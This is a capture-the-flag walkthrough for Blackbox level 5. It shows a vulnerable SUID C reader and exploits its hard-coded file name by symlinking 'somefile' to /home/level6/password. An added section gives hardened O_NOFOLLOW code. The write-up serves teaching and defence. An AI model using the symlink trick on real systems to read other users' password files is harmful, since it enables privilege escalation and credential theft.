Blackbox Level 5 – Path/File Hijacking with Symlinks

Today we’re going to be looking at level 5 of the Blackbox wargame from the Smash The Stack network.  As always, the final password will be replaced with Y’s, and if you wish to follow along, you will already need to have the password to level 5.  So without further ado, let’s get started by ssh’ing into blackbox as level5.

Upon logging in, a quick directory listing shows us an executable called “list” and what we can assume is its source code, “list.c”.  To evaluate the program, let’s move forward by viewing the file “list.c”.

level5@blackbox:~$ more list.c
#include <stdio.h>
int main(int argc, char **argv)
{
    char buf[100];          /* 100-byte read chunk */
    size_t len;
    char fixedbuf[10240];   /* filtered copy of the whole file */
    FILE *fh;
    char *ptr = fixedbuf;   /* write cursor into fixedbuf */
    int i;

    fh = fopen("somefile", "r");   /* hard-coded, relative file name */
    if(!fh)
        return 0;

    while((len = fread(buf, 1, 100, fh)) > 0) {
        for(i = 0; i < len; i++) {
            // Disable output modifiers
            switch(buf[i]) {
            case 0xFF:
            case 0x00:
            case 0x01:
                break;
            default:
                *ptr = buf[i];
                ptr++;
            }
        }
    }
    printf("%s", fixedbuf);

    fclose(fh);
}

Upon inspection we can see a few local variables declared at the top of the main function, followed by the procedure.  The variables are: a 100-character array called buf, a size_t variable called len, a 10K char array called fixedbuf, a FILE pointer called fh, a char pointer called ptr (initialised to point to the start of fixedbuf), and an int called i.  Following the declarations, the procedure starts.

First, a local file called “somefile” is opened for reading and the resulting FILE pointer is stored in “fh”.  If there is a problem opening the file for reading, the program exits returning 0.  Next, up to 100 bytes at a time are read from the file into the “buf” array.  These bytes are walked through one by one and, as long as a byte isn’t 0xFF, 0x00, or 0x01, it is copied into “fixedbuf” and the next byte is assessed.  Once the full file has been copied into “fixedbuf,” printf is called to print the string held in “fixedbuf.”  Finally “fh” is closed and the program exits.

So, let’s think about how this program works, and how we might be able to alter its assumptions to get the password for level 6.  We know that blowfish stores passwords in the home directories, so we need to read /home/level6/password.  We also know this program is running SUID as level6 and thus should be able to read that file.  However, the program is set to read a hard-coded file name, the file called “somefile” in the current directory.  Thus, what can we do?  Even if we switched directories to /home/level6, how could we get the program to read the “password” file instead of the “somefile” file?

Well, we can use links.  Links are available in many operating systems and essentially allow multiple virtual locations (such as “/tmp/.tt/file1” and “/tmp/.tt/file2”) to point to the same physical file on a disk.  This is useful to save space on a disk or to help organize files that are shared.  A symbolic link, or symlink, is a separate directory entry that holds the path of its target; both paths still appear as distinct files, but when a program opens the symlink, the operating system transparently follows it to the target.  We can make use of symlinks in this level to create a symlink called “somefile” in the local directory which points to the file we want to read, /home/level6/password.  To make a link we’re going to use the Linux command “ln”.  To get information on the command, please run “ln --help” on your own, I don’t want to post it here just to save space.  However, to create a symlink rather than a hard link, we have to use the -s flag.  Let’s look at making the symlink in action:

level5@blackbox:/tmp/.ttt$ ln -s /home/level6/password ./somefile
level5@blackbox:/tmp/.ttt$ ls -la
total 16
drwxr-xr-x 2 level5 gamers 4096 Sep 25 02:40 .
drwx-wx-wt 95 root root 12288 Sep 25 02:40 ..
lrwxrwxrwx 1 level5 gamers 21 Sep 25 02:40 somefile -> /home/level6/password

From the file listing, we can see that there is now a file called “somefile” and, in the information about the file, it is marked with an “l” for link.  We also see that it points to /home/level6/password.  Now let’s go ahead and run the vulnerable program and see if it resolves the link and reads the password for us!

level5@blackbox:/tmp/.ttt$ ~/list
YYYYYYYYYYYY

There we have it!  Using a simple symlink we were able to take a program which reads and displays the contents of a file with a hardcoded filename, and cause it to output any file of our choosing, even one with sensitive information such as a password!
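As an added example (not part of the original post or the wargame’s own code), here is how a SUID reader like list could open its input so that a planted symlink cannot redirect it: O_NOFOLLOW refuses a link at the final path component, and an fstat check refuses any file the real (invoking) user does not own. The demo function, its temp directory and its file names are constructed for illustration only.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened open for a SUID reader such as list: refuse a symlink at the last
 * path component and accept only a regular file owned by the real (invoking)
 * user, so a link planted in the current directory cannot redirect the read. */
int open_trusted(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;  /* errno == ELOOP when the last component is a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        errno = EPERM;  /* wrong type or not owned by the caller's real uid */
        return -1;
    }
    return fd;
}

/* Demo in a fresh temp dir: create real.txt, then "somefile" -> real.txt, the
 * same shape as the walkthrough. Returns 1 when the real file opens and the
 * symlink is refused with ELOOP (constructed sample, not the wargame files). */
int demo_symlink_rejected(void)
{
    char dir[] = "/tmp/lvl5demo.XXXXXX";
    if (!mkdtemp(dir))
        return 0;
    char real[64], link[64];
    snprintf(real, sizeof real, "%s/real.txt", dir);
    snprintf(link, sizeof link, "%s/somefile", dir);
    int fd = open(real, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || symlink(real, link) < 0)
        return 0;
    close(fd);
    int good = open_trusted(real);    /* regular file we own: accepted */
    int bad = open_trusted(link);     /* symlink to it: refused */
    int ok = good >= 0 && bad < 0 && errno == ELOOP;
    if (good >= 0)
        close(good);
    unlink(link);
    unlink(real);
    rmdir(dir);
    return ok;
}
```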
